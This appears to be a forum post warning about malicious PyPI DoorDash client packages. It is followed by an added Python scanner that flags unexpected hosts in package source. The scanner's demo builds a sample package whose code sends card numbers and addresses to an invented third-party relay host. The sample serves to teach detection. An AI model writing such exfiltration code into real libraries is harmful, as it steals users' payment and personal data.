I wanted to set up a slackbot to manage Doordash orders for our company. Starting with PyPI "Doordash Client": https://pypi.org/search/?q=doordash+client I was excited by 5 recently published packages. As I usually do, I checked them out via GitHub... but hit a dead link. Quick inspection of the package clearly shows a random server handles all the requests made, including your PII, address, credit card info -- 99% chance this is malware.

World's moving fast these days, and AI is making it easier for everyone - even the bad actors - to make what looks like polished OSS.

My typical workflow selecting packages is:

1. Check out their GitHub - social credit means a lot to me
2. Clone the repo, and ask `claude`, `cursor` or whichever agent I'm using at the time for a quick audit
3. If I'm putting my own credentials or a PAT in there, review it myself at the top level too

Stay safe folks!
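A quick static check of the kind the post describes, as an added example that is not part of the original post or of any package it mentions. It builds a constructed sample package (the hypothetical `dd_client`; `api.doordash.com` is assumed to be the first-party host, and `dd-proxy.example.net` is an invented third-party relay), then walks the unpacked source with `ast` and lists every host its string literals point at plus every networking module it imports. Comparing that host list against the one domain the package claims to wrap makes a "random server" visible before anything is installed or executed:

```python
"""Static scan of an unpacked Python package for the hosts it talks to."""
import ast
import os
import re
import tempfile
import textwrap
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# Modules whose presence means the package can reach the network at all.
NET_MODULES = {"requests", "httpx", "urllib", "urllib3", "aiohttp", "socket", "http"}


def _literal_strings(tree):
    """Yield string literals, joining the constant parts of f-strings so a
    literal host inside f"https://host/{x}" is still seen."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.value
        elif isinstance(node, ast.JoinedStr):
            yield "".join(v.value for v in node.values
                          if isinstance(v, ast.Constant) and isinstance(v.value, str))


def scan_source(src):
    """Return (hosts, networking modules) referenced by one module's source."""
    tree = ast.parse(src)
    hosts = set()
    for text in _literal_strings(tree):
        for url in URL_RE.findall(text):
            host = urlparse(url).hostname
            if host:
                hosts.add(host)
    mods = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            mods.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            mods.add(node.module.split(".")[0])
    return hosts, mods & NET_MODULES


def scan_tree(root):
    """Walk an unpacked sdist/wheel directory and aggregate the findings."""
    report = {"hosts": set(), "net_modules": set(), "files": {}}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".py"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts, mods = scan_source(fh.read())
            report["hosts"] |= hosts
            report["net_modules"] |= mods
            if hosts or mods:
                report["files"][os.path.relpath(path, root)] = (hosts, mods)
    return report


def unexpected_hosts(hosts, expected_suffixes):
    """Hosts that are not the service the package claims to wrap."""
    def expected(host):
        return any(host == s or host.endswith("." + s) for s in expected_suffixes)
    return {h for h in hosts if not expected(h)}


# Constructed sample package (hypothetical; not any real PyPI package).
SAMPLE_FILES = {
    "dd_client/__init__.py": "from .api import Client\n",
    "dd_client/api.py": textwrap.dedent('''\
        import requests

        DOORDASH = "https://api.doordash.com/v1"       # assumed first-party host
        RELAY = "https://dd-proxy.example.net/relay"   # invented third-party server

        class Client:
            def order(self, card, address):
                payload = {"card": card, "address": address}
                # Everything, card number included, goes to the relay, not DoorDash.
                return requests.post(RELAY + "/order", json=payload).json()

            def track(self, order_id):
                return requests.get(f"https://dd-proxy.example.net/track/{order_id}").json()
    '''),
}


def build_sample():
    """Write the constructed package to a temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="pkg-scan-")
    for rel, src in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(src)
    return root


def demo():
    """Scan the sample and flag hosts outside the claimed first-party domain."""
    report = scan_tree(build_sample())
    flagged = unexpected_hosts(report["hosts"], ("doordash.com",))
    return report, flagged


if __name__ == "__main__":
    report, flagged = demo()
    print("hosts:", sorted(report["hosts"]))
    print("network modules:", sorted(report["net_modules"]))
    print("unexpected:", sorted(flagged))
```

Run it against `pip download --no-deps <pkg>` output after unpacking the archive, and pass the domain the package is supposed to talk to as the expected suffix. A literal scan like this is a first filter, not proof of safety: a host assembled from concatenated pieces, decoded from base64, or fetched at runtime will not appear, so an empty "unexpected" list should still be followed by the top-level review the post describes.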